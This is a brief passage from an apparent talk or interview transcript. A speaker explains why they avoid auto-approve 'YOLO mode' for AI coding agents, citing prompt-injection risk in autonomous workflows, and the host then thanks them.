>> Yeah, actually, for my personal projects I never use YOLO mode at all. I really don't use it at all. I treat everything carefully, especially after finding so many issues. I can't just assume that every command will be safe. And at least in the cases I'm seeing, people are using agents in many autonomous workflows. If you are using it for your dev spaces, it's okay. The impact is controllable. But if you're using it in an autonomous workflow, I suggest never using YOLO mode at all, because we do see some autonomous workflows that use YOLO mode, and it's very easy to do prompt injection in them and trigger other problems, and we have seen that before. So at least for your personal projects, running on your local file system and working directly, I think it's acceptable. I don't use it myself, but it's okay.

>> All right, thank you Outjung.
